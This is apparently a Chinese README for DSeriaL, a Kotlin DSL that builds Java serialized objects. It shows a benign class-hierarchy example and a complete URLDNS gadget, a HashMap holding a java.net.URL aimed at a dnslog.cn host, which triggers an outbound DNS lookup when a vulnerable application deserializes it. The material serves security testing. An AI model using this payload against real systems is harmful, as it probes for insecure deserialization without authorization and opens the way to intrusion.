DSeriaL 是用来构建 Java 序列化数据的 DSL(domain-specific language),代码参考 serial-builder
比如想要构建以下 Java 类的序列化数据:
public class HierarchyBase implements Serializable {
public static final long serialVersionUID = 1L;
public int i;
public HierarchyBase(int i) {
this.i = i;
}
}
public class HierarchySub extends HierarchyBase {
public static final long serialVersionUID = 1L;
public char c;
public HierarchySub(int i, char c) {
super(i);
this.c = c;
}
}可使用以下代码:
Serial {
descriptors {
desc {
type = HierarchySub::class.java
uid = HierarchySub.serialVersionUID
"c" type Char::class.java
}
desc {
type = HierarchyBase::class.java
uid = HierarchyBase.serialVersionUID
"i" type Int::class.java
}
}
slot { prims { intVal(5) } }
slot { prims { charVal('a') } }
}用 DSeriaL 构造 URLDNS Gadget:
Serial {
descriptors {
desc {
typeName = "java.util.HashMap"
uid = 362498820763181265L
flags = SC_SERIALIZABLE or SC_WRITE_METHOD
"loadFactor" type Float::class.java
"threshold" type Int::class.java
}
}
slot {
prims {
floatVal(0.75f)
intVal(12)
}
writeObject {
it.write(byteArrayOf(0, 0, 0, 16, 0, 0, 0, 1))
serialObj {
descriptors {
desc {
typeName = "java.net.URL"
uid = -7627629688361524110L
flags = SC_SERIALIZABLE or SC_WRITE_METHOD
"hashCode" type Int::class.java
"port" type Int::class.java
"authority" type String::class.java
"file" type String::class.java
"host" type String::class.java
"protocol" type String::class.java
"ref" typeName "java.lang.String"
}
}
slot {
prims {
intVal(-1)
intVal(-1)
}
objs {
string("dserial.kyrvep.dnslog.cn")
string("")
string("dserial.kyrvep.dnslog.cn")
string("http")
nil()
}
writeObject {}
}
}
string("http://dserial.kyrvep.dnslog.cn")
}
}
}